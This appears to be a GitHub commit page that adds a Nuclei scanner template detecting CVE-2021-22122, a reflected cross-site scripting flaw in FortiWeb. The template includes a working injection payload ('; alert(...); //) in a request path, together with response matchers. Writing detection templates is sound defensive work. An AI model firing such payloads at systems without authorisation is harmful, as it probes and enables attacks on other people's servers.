Merge pull request #806 from dwisiswant0/add/CVE-2021-22122

Add CVE-2021-22122
patch-1
PD-Team 2021-02-04 19:44:17 +05:30 committed by GitHub
commit 0249b32366
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: CVE-2021-22122
info:
name: FortiWeb v6.3.x-6.2.x Unauthenticated XSS
author: dwisiswant0
severity: medium
# FortiWeb GUI interface may allow an unauthenticated, remote attacker
# to perform a reflected cross site scripting attack (XSS) by injecting
# malicious payload in different vulnerable API end-points.
# -
# References:
# - https://www.fortiguard.com/psirt/FG-IR-20-122
# - https://twitter.com/ptswarm/status/1357316793753362433
requests:
- method: GET
path:
- "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//"
matchers-condition: and
matchers:
- type: word
words:
- "nuclei"
- "No policy has been chosen."
condition: and
part: body